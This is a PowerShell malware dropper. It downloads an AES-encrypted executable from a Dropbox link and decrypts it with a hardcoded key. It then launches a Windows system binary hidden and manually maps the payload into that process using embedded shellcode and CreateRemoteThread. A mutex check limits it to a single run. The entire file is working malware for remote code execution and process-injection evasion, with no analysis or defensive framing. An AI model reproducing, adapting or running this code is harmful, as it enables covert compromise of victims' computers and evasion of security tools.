Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class Win32 {
    public const uint PROCESS_ALL_ACCESS = 0x1F0FFF;
    public const uint MEM_COMMIT = 0x1000;
    public const uint MEM_RESERVE = 0x2000;
    public const uint PAGE_READWRITE = 0x04;
    public const uint PAGE_EXECUTE_READWRITE = 0x40;

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
        UIntPtr dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
        byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
        byte[] lpBuffer, UIntPtr size, out UIntPtr lpNumberOfBytesRead);

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes,
        UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll", CharSet=CharSet.Ansi, SetLastError=true)]
    public static extern IntPtr GetModuleHandleA(string lpModuleName);

    [DllImport("kernel32.dll", CharSet=CharSet.Ansi, SetLastError=true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    [DllImport("kernel32.dll", CharSet=CharSet.Ansi, SetLastError=true)]
    public static extern IntPtr LoadLibraryA(string lpFileName);
}
"@ -PassThru | Out-Null

# ----------- shell code ------------------------
$shellcode = [byte[]](
	0x48, 0x89, 0x4C, 0x24, 0x08, 0x48, 0x81, 0xEC, 0x18, 0x01, 0x00, 0x00, 0x48, 0x83, 0xBC, 0x24,
	0x20, 0x01, 0x00, 0x00, 0x00, 0x75, 0x15, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00, 0x48,
	0xC7, 0x40, 0x20, 0x40, 0x40, 0x40, 0x00, 0xE9, 0x1B, 0x05, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24,
	0x20, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8B, 0x44,
	0x24, 0x28, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x8D, 0x44, 0x01, 0x18,
	0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x00,
	0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00,
	0x48, 0x8B, 0x40, 0x08, 0x48, 0x89, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24,
	0x20, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84, 0x24, 0xE8, 0x00, 0x00, 0x00,
	0x48, 0x8B, 0x44, 0x24, 0x30, 0x8B, 0x40, 0x10, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8,
	0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xF8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x30,
	0x48, 0x8B, 0x40, 0x18, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x2B, 0xC8, 0x48, 0x8B, 0xC1, 0x48,
	0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xBC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x00,
	0x0F, 0x84, 0x51, 0x01, 0x00, 0x00, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x05, 0x48,
	0x8B, 0x4C, 0x24, 0x30, 0x83, 0x7C, 0x01, 0x74, 0x00, 0x0F, 0x84, 0x38, 0x01, 0x00, 0x00, 0xB8,
	0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x05, 0x48, 0x8B, 0x4C, 0x24, 0x30, 0x8B, 0x44, 0x01,
	0x70, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24,
	0x38, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x05, 0x48, 0x8B, 0x4C, 0x24, 0x30, 0x8B,
	0x44, 0x01, 0x74, 0x48, 0x8B, 0x4C, 0x24, 0x38, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89,
	0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48, 0x39,
	0x44, 0x24, 0x38, 0x0F, 0x83, 0xDE, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x83, 0x78,
	0x04, 0x00, 0x0F, 0x84, 0xCF, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x8B, 0x40, 0x04,
	0x48, 0x83, 0xE8, 0x08, 0x33, 0xD2, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x48, 0xF7, 0xF1, 0x89, 0x44,
	0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x48, 0x83, 0xC0, 0x08, 0x48, 0x89, 0x44, 0x24, 0x68,
	0xC7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x18, 0x8B, 0x44, 0x24, 0x48, 0xFF, 0xC0,
	0x89, 0x44, 0x24, 0x48, 0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x83, 0xC0, 0x02, 0x48, 0x89, 0x44,
	0x24, 0x68, 0x8B, 0x44, 0x24, 0x70, 0x39, 0x44, 0x24, 0x48, 0x74, 0x5E, 0x48, 0x8B, 0x44, 0x24,
	0x68, 0x0F, 0xB7, 0x00, 0xC1, 0xF8, 0x0C, 0x83, 0xF8, 0x0A, 0x75, 0x4C, 0x48, 0x8B, 0x44, 0x24,
	0x38, 0x8B, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x8B,
	0x4C, 0x24, 0x68, 0x0F, 0xB7, 0x09, 0x81, 0xE1, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x63, 0xC9, 0x48,
	0x03, 0xC1, 0x48, 0x89, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x88, 0x00,
	0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x03, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8C,
	0x24, 0x88, 0x00, 0x00, 0x00, 0x48, 0x89, 0x01, 0xEB, 0x80, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x8B,
	0x40, 0x04, 0x48, 0x8B, 0x4C, 0x24, 0x38, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44,
	0x24, 0x38, 0xE9, 0x0F, 0xFF, 0xFF, 0xFF, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x01,
	0x48, 0x8B, 0x4C, 0x24, 0x30, 0x83, 0x7C, 0x01, 0x74, 0x00, 0x0F, 0x84, 0x9E, 0x01, 0x00, 0x00,
	0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x01, 0x48, 0x8B, 0x4C, 0x24, 0x30, 0x8B, 0x44,
	0x01, 0x70, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44,
	0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x83, 0x78, 0x0C, 0x00, 0x0F, 0x84, 0x6D, 0x01, 0x00,
	0x00, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x8B, 0x40, 0x0C, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03,
	0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24,
	0xA8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24,
	0xB0, 0x00, 0x00, 0x00, 0xFF, 0x94, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98,
	0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x8B, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48,
	0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x8B,
	0x40, 0x10, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44,
	0x24, 0x58, 0x48, 0x83, 0x7C, 0x24, 0x40, 0x00, 0x75, 0x0A, 0x48, 0x8B, 0x44, 0x24, 0x58, 0x48,
	0x89, 0x44, 0x24, 0x40, 0xEB, 0x1C, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0x83, 0xC0, 0x08, 0x48,
	0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24, 0x58, 0x48, 0x83, 0xC0, 0x08, 0x48, 0x89, 0x44,
	0x24, 0x58, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0x83, 0x38, 0x00, 0x0F, 0x84, 0xAA, 0x00, 0x00,
	0x00, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
	0x48, 0x8B, 0x00, 0x48, 0x23, 0xC1, 0x48, 0x85, 0xC0, 0x74, 0x3A, 0x48, 0x8B, 0x84, 0x24, 0x90,
	0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x40,
	0x48, 0x8B, 0x00, 0x48, 0x25, 0xFF, 0xFF, 0x00, 0x00, 0x48, 0x8B, 0xD0, 0x48, 0x8B, 0x8C, 0x24,
	0x98, 0x00, 0x00, 0x00, 0xFF, 0x94, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x58,
	0x48, 0x89, 0x01, 0xEB, 0x51, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x00, 0x48, 0x8B, 0x4C,
	0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xC8, 0x00, 0x00, 0x00,
	0x48, 0x8B, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0xD0, 0x00, 0x00, 0x00,
	0x48, 0x8B, 0x84, 0x24, 0xC8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC0, 0x02, 0x48, 0x8B, 0xD0, 0x48,
	0x8B, 0x8C, 0x24, 0x98, 0x00, 0x00, 0x00, 0xFF, 0x94, 0x24, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x8B,
	0x4C, 0x24, 0x58, 0x48, 0x89, 0x01, 0xE9, 0x2B, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0x44, 0x24, 0x50,
	0x48, 0x83, 0xC0, 0x14, 0x48, 0x89, 0x44, 0x24, 0x50, 0xE9, 0x84, 0xFE, 0xFF, 0xFF, 0xB8, 0x08,
	0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x09, 0x48, 0x8B, 0x4C, 0x24, 0x30, 0x83, 0x7C, 0x01, 0x74,
	0x00, 0x74, 0x7F, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x09, 0x48, 0x8B, 0x4C, 0x24,
	0x30, 0x8B, 0x44, 0x01, 0x70, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1,
	0x48, 0x89, 0x84, 0x24, 0xD8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0xD8, 0x00, 0x00, 0x00,
	0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x44, 0x24, 0x60, 0xEB, 0x0E, 0x48, 0x8B, 0x44, 0x24, 0x60,
	0x48, 0x83, 0xC0, 0x08, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x83, 0x7C, 0x24, 0x60, 0x00, 0x74,
	0x31, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x83, 0x38, 0x00, 0x74, 0x26, 0x48, 0x8B, 0x44, 0x24,
	0x60, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0xE0, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC0, 0xBA,
	0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x28, 0xFF, 0x94, 0x24, 0xE0, 0x00, 0x00, 0x00,
	0xEB, 0xB9, 0xC6, 0x44, 0x24, 0x20, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00, 0x83,
	0x78, 0x38, 0x00, 0x74, 0x63, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x48, 0x6B, 0xC0, 0x03, 0x48, 0x8B,
	0x4C, 0x24, 0x30, 0x48, 0x8B, 0x44, 0x01, 0x70, 0x48, 0x89, 0x44, 0x24, 0x78, 0x83, 0x7C, 0x24,
	0x7C, 0x00, 0x74, 0x44, 0x48, 0x8B, 0x84, 0x24, 0xE8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24,
	0xF0, 0x00, 0x00, 0x00, 0x8B, 0x44, 0x24, 0x7C, 0x33, 0xD2, 0xB9, 0x0C, 0x00, 0x00, 0x00, 0x48,
	0xF7, 0xF1, 0x8B, 0x4C, 0x24, 0x78, 0x48, 0x8B, 0x54, 0x24, 0x28, 0x48, 0x03, 0xD1, 0x48, 0x8B,
	0xCA, 0x4C, 0x8B, 0x44, 0x24, 0x28, 0x8B, 0xD0, 0xFF, 0x94, 0x24, 0xF0, 0x00, 0x00, 0x00, 0x85,
	0xC0, 0x75, 0x05, 0xC6, 0x44, 0x24, 0x20, 0x01, 0x48, 0x8B, 0x84, 0x24, 0xF8, 0x00, 0x00, 0x00,
	0x48, 0x89, 0x84, 0x24, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00,
	0x4C, 0x8B, 0x40, 0x30, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00, 0x8B, 0x50, 0x28, 0x48,
	0x8B, 0x4C, 0x24, 0x28, 0xFF, 0x94, 0x24, 0x00, 0x01, 0x00, 0x00, 0x0F, 0xB6, 0x44, 0x24, 0x20,
	0x85, 0xC0, 0x74, 0x12, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00, 0x48, 0xC7, 0x40, 0x20,
	0x50, 0x50, 0x50, 0x00, 0xEB, 0x11, 0x48, 0x8B, 0x84, 0x24, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8B,
	0x4C, 0x24, 0x28, 0x48, 0x89, 0x48, 0x20, 0x48, 0x81, 0xC4, 0x18, 0x01, 0x00, 0x00, 0xC3
)

# ---------- Helper: get function pointer ----------
function Get-FuncPtr {
    param(
        [string]$moduleName,
        [string]$procName
    )
    # Try GetModuleHandle first
    $hMod = [Win32]::GetModuleHandleA($moduleName)
    if ($hMod -eq [IntPtr]::Zero) {
        # If not loaded, try LoadLibraryA
        $hMod = [Win32]::LoadLibraryA($moduleName)
        if ($hMod -eq [IntPtr]::Zero) { throw "Unable to load module $moduleName" }
    }
    $addr = [Win32]::GetProcAddress($hMod, $procName)
    if ($addr -eq [IntPtr]::Zero) { throw "GetProcAddress failed for $procName in $moduleName" }
    return $addr
}


function Read-UInt16($b, $offset) { [BitConverter]::ToUInt16($b,$offset) }
function Read-UInt32($b, $offset) { [BitConverter]::ToUInt32($b,$offset) }
function Read-Int32($b, $offset) { [BitConverter]::ToInt32($b,$offset) }

function Parse-PEHeaders {
    param([byte[]]$data)
    # Returns a hashtable with fields: Machine, NumberOfSections, SizeOfImage, SizeOfHeaders, Sections(array)
    $dos_e_magic = [BitConverter]::ToUInt16($data, 0)
    # if ($dos_e_magic -ne 0x5A4D) { throw "Not MZ/PE file." }
    $e_lfanew = [BitConverter]::ToInt32($data, 0x3C)
    $nt_sig = [BitConverter]::ToUInt32($data, $e_lfanew)
    if ($nt_sig -ne 0x4550) { throw "Invalid PE signature." }

    $fileHeaderOffset = $e_lfanew + 4
    $machine = Read-UInt16 $data $fileHeaderOffset
    $numberOfSections = Read-UInt16 $data ($fileHeaderOffset + 2)
    $sizeOfOptionalHeader = Read-UInt16 $data ($fileHeaderOffset + 16)
    $optionalHeaderOffset = $fileHeaderOffset + 20
    $magic = Read-UInt16 $data $optionalHeaderOffset
    $is64 = ($magic -eq 0x20b)

    if ($is64) {
        $sizeOfImage = Read-UInt32 $data ($optionalHeaderOffset + 56)   # Offset of SizeOfImage in OptionalHeader64 = 56
        $sizeOfHeaders = Read-UInt32 $data ($optionalHeaderOffset + 60)
        $dataDirOffset = $optionalHeaderOffset + 112
    } else {
        $sizeOfImage = Read-UInt32 $data ($optionalHeaderOffset + 56)   # Offset of SizeOfImage in OptionalHeader32 = 56 (same)
        $sizeOfHeaders = Read-UInt32 $data ($optionalHeaderOffset + 60)
        $dataDirOffset = $optionalHeaderOffset + 96
    }

    $sectionOffset = $optionalHeaderOffset + $sizeOfOptionalHeader
    $sections = @()
    for ($i=0; $i -lt $numberOfSections; $i++) {
        $nameBytes = $data[$sectionOffset..($sectionOffset+7)]
        $name = ([Text.Encoding]::ASCII.GetString($nameBytes)).Trim([char]0)
        $virtualSize = Read-UInt32 $data ($sectionOffset + 8)
        $virtualAddress = Read-UInt32 $data ($sectionOffset + 12)
        $sizeOfRawData = Read-UInt32 $data ($sectionOffset + 16)
        $pointerToRawData = Read-UInt32 $data ($sectionOffset + 20)
        $characteristics = Read-UInt32 $data ($sectionOffset + 36)

        $sections += [PSCustomObject]@{
            Name = $name
            VirtualSize = $virtualSize
            VirtualAddress = $virtualAddress
            SizeOfRawData = $sizeOfRawData
            PointerToRawData = $pointerToRawData
            Characteristics = $characteristics
        }
        $sectionOffset += 40
    }

    return @{
        Is64 = $is64
        Machine = $machine
        NumberOfSections = $numberOfSections
        SizeOfImage = $sizeOfImage
        SizeOfHeaders = $sizeOfHeaders
        Sections = $sections
        e_lfanew = $e_lfanew
    }
}


function Invoke-ManualMapLike {
    param(
        [Parameter(Mandatory=$true)] [int]$TargetPid,
        [Parameter(Mandatory=$true)] [byte[]]$bytes
    )

    $pe = Parse-PEHeaders -data $bytes

    #Write-Host "PE parsed: SizeOfImage=$($pe.SizeOfImage), sections=$($pe.NumberOfSections), Is64=$($pe.Is64)"


    $hProc = [Win32]::OpenProcess([Win32]::PROCESS_ALL_ACCESS, $false, [uint32]$TargetPid)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess failed. Are you admin?"; }

    # Allocate SizeOfImage in remote process
    $remoteBase = [Win32]::VirtualAllocEx($hProc, [IntPtr]::Zero, [UIntPtr] $pe.SizeOfImage, [Win32]::MEM_COMMIT -bor [Win32]::MEM_RESERVE, [Win32]::PAGE_READWRITE)
    if ($remoteBase -eq [IntPtr]::Zero) { throw "VirtualAllocEx failed: $( [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() )" }
    #Write-Host "[+] Allocated remote image at $remoteBase"

    # Write headers (write first SizeOfHeaders or 0x1000 like C++ code)
    $headSize = [Math]::Min(0x1000, $pe.SizeOfHeaders)
    $headBuf = $bytes[0..($headSize-1)]
    $out = [UIntPtr]::Zero
    $size = [UIntPtr]::op_Explicit($headBuf.Length)
    $ok = [Win32]::WriteProcessMemory($hProc, $remoteBase, $headBuf, $size, [ref]$out)
    if (-not $ok) { throw "WriteProcessMemory header failed: $( [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() )" }
    Write-Host "[+] Wrote headers ($($headBuf.Length) bytes)"


    # Write each section's raw data to remote at VirtualAddress
    foreach ($s in $pe.Sections) {
        if ($s.SizeOfRawData -gt 0) {
            $chunk = $bytes[$s.PointerToRawData..($s.PointerToRawData + $s.SizeOfRawData - 1)]
            $dest = [IntPtr]($remoteBase.ToInt64() + $s.VirtualAddress)
            $written = [UIntPtr]::Zero
            $size = [UIntPtr]::op_Explicit($chunk.Length)
            $ok = [Win32]::WriteProcessMemory($hProc, $dest, $chunk, $size, [ref]$written)
            if (-not $ok) { throw "WriteProcessMemory section $($s.Name) failed: $( [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() )" }
            #Write-Host "[+] Wrote section $($s.Name) -> VA 0x{0:X}" -f $s.VirtualAddress
        }
    }

    # Optionally set protections per section (best-effort)
    foreach ($s in $pe.Sections) {
        if ($s.VirtualSize -gt 0) {
            $dest = [IntPtr]($remoteBase.ToInt64() + $s.VirtualAddress)
            $size = [UIntPtr] $s.VirtualSize
            $newProt = [Win32]::PAGE_READWRITE
            if (($s.Characteristics -band 0x20000000) -ne 0) { $newProt = [Win32]::PAGE_READWRITE }      # IMAGE_SCN_MEM_WRITE
            if (($s.Characteristics -band 0x20000000) -eq 0 -and ($s.Characteristics -band 0x20000000) -ne 0) { $newProt = [Win32]::PAGE_READONLY }
            # best-effort call
            $old = 0
            [Win32]::VirtualProtectEx($hProc, $dest, $size, [Win32]::PAGE_EXECUTE_READWRITE, [ref]$old) | Out-Null
        }
    }

    # Write mapping data area (simple placeholder struct)
    # We'll craft a small struct: pointer to remote base (8 or 4 bytes), fdwReason(4), reserved ptr(8/4), flags

    $is64 = [IntPtr]::Size -eq 8
    if ($is64) { $ptrSize = 8 } else { $ptrSize = 4 }

    function PtrToBytes([IntPtr]$p) {
        if ($ptrSize -eq 8) {
            return [BitConverter]::GetBytes([UInt64]$p.ToInt64())
        } else {
            return [BitConverter]::GetBytes([UInt32]$p.ToInt32())
        }
    }
    $is64 = $pe.Is64
    if ($is64) {
        $ptrSize = 8
        $pack = [System.BitConverter]::GetBytes([Int64] $remoteBase.ToInt64())
    } else {
        $ptrSize = 4
        $pack = [System.BitConverter]::GetBytes([Int32] $remoteBase.ToInt32())
    }

    $ptrLoadLibraryA   = Get-FuncPtr -moduleName "kernel32.dll" -procName "LoadLibraryA"
    $ptrGetProcAddress = Get-FuncPtr -moduleName "kernel32.dll" -procName "GetProcAddress"
    # RtlAddFunctionTable is in ntdll
    $ptrRtlAddFunctionTable = Get-FuncPtr -moduleName "ntdll.dll" -procName "RtlAddFunctionTable"

    #Write-Host "LoadLibraryA  = 0x{0:X}" -f $ptrLoadLibraryA.ToInt64()
    #Write-Host "GetProcAddress = 0x{0:X}" -f $ptrGetProcAddress.ToInt64()
    #Write-Host "RtlAddFunctionTable = 0x{0:X}" -f $ptrRtlAddFunctionTable.ToInt64()

    # simple mapping data: pBase (ptr), fdwReason (4), reserved (ptr), SEHSupport(1)
     $mapbuf = New-Object byte[](64)

    # 0x00 - pLoadLibraryA
    [Array]::Copy((PtrToBytes $ptrLoadLibraryA), 0, $mapbuf, 0, 8)

    # 0x08 - pGetProcAddress
    [Array]::Copy((PtrToBytes $ptrGetProcAddress), 0, $mapbuf, 8, 8)

    # 0x10 - pRtlAddFunctionTable
    [Array]::Copy((PtrToBytes $ptrRtlAddFunctionTable), 0, $mapbuf, 16, 8)

    # 0x18 - pbase
    [Array]::Copy((PtrToBytes $remoteBase), 0, $mapbuf, 24, 8)

    # 0x20 - fdwReason (DWORD=4 bytes)
    [Array]::Copy([BitConverter]::GetBytes(0), 0, $mapbuf, 32, 4)

    # 0x24 - padding (자동 0)

    # 0x28 - reservedParam (LPVOID=8 bytes)
    [Array]::Copy([BitConverter]::GetBytes([Int64]1), 0, $mapbuf, 40, 8)

    # 0x30 - SEHSupport (BOOL=4 bytes)
    [Array]::Copy([BitConverter]::GetBytes(0), 0, $mapbuf, 48, 4)

    # 0x34 padding 4 bytes (자동 0)

    # 0x38 - hMod (output placeholder) set to 0
    [Array]::Copy([BitConverter]::GetBytes([UInt64] 1), 0, $mapbuf, 56, 8)

    $size = [UIntPtr]::op_Explicit($mapbuf.Length)
    $mapRemote = [Win32]::VirtualAllocEx($hProc, [IntPtr]::Zero, $size, [Win32]::MEM_COMMIT -bor [Win32]::MEM_RESERVE, [Win32]::PAGE_READWRITE)
    if ($mapRemote -eq [IntPtr]::Zero) { throw "Mapping data alloc failed" }
    $size = [UIntPtr]::op_Explicit($mapbuf.Length)
    [Win32]::WriteProcessMemory($hProc, $mapRemote, $mapbuf, [UIntPtr] $size, [ref]$out) | Out-Null
    #Write-Host "[+] Wrote mapping data at $mapRemote"

    # If shellcode binary provided -> write shellcode and execute
    $scBytes = $shellcode
    $size = [UIntPtr]::op_Explicit($scBytes.Length)
    $scRemote = [Win32]::VirtualAllocEx($hProc, [IntPtr]::Zero, $size, [Win32]::MEM_COMMIT -bor [Win32]::MEM_RESERVE, [Win32]::PAGE_EXECUTE_READWRITE)
    if ($scRemote -eq [IntPtr]::Zero) { throw "Shellcode alloc failed" }
    [Win32]::WriteProcessMemory($hProc, $scRemote, $scBytes, $size, [ref]$out) | Out-Null
    Write-Host "[+] Wrote shellcode at $scRemote, size $($scBytes.Length)"

    $tid = 0
    $hThread = [Win32]::CreateRemoteThread($hProc, [IntPtr]::Zero, [UIntPtr]::Zero, $scRemote, $mapRemote, 0, [ref]$tid)
    if ($hThread -eq [IntPtr]::Zero) { throw "CreateRemoteThread for shellcode failed: $( [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() )" }
    #Write-Host "[+] Remote thread created (shellcode). TID=$tid"
    return @{ RemoteBase=$remoteBase; MapRemote=$mapRemote; ShellcodeRemote=$scRemote; ThreadId=$tid }
}

function New-AesKey {
     $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256
    $aes.Key = @(122, 63, 156, 29, 75, 46, 106, 143, 144, 197, 209, 226, 164, 184, 246, 115, 94, 156, 42, 29, 123, 111, 4, 131, 225, 92, 154, 45, 143, 107, 76, 1);
    $aes.GenerateIV()

    return @{ Key = $aes.Key; IV = $aes.IV }
}

function Decrypt-File($inputBytes, $Key) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = $inputBytes[0..15]

    $decryptor = $aes.CreateDecryptor()
    $decrypted = $decryptor.TransformFinalBlock($inputBytes[16..($inputBytes.Length - 1)], 0, $inputBytes.Length - 16)

    return $decrypted
}

try{$mutex = [System.Threading.Mutex]::OpenExisting('Global\\{B4F7E21A-3C9D-4A6E-8B50-1D92FEC673AA}');$mutex.Close(); return;}catch{};

$PEUrl = "https://www.dropbox.com/scl/fi/txapbzie8l95bu6juk3zb/image.dat?rlkey=f8ck1taqzfdrld7u56gomokxk&st=xao9w7kg&dl=1";

$WebClient = New-Object System.Net.WebClient
[Byte[]]$Buffer = $WebClient.DownloadData($PEUrl)

$BufferSize = $Buffer.Length

if($BufferSize -eq 0)
{
    return
}

$cred = New-AesKey
$PEBytes = Decrypt-File $Buffer $cred.Key

# $PEBytes = [System.IO.File]::ReadAllBytes("D:\work\Dropper Test\sword_com_seed.dll");

$filePath = "C:\Windows\System32\LanguageComponentsInstallerComHandler.exe"
$process = Start-Process -FilePath $filePath -WindowStyle Hidden -PassThru

$HostPID = $process.Id

$result = Invoke-ManualMapLike -TargetPid $HostPID -bytes $PEBytes
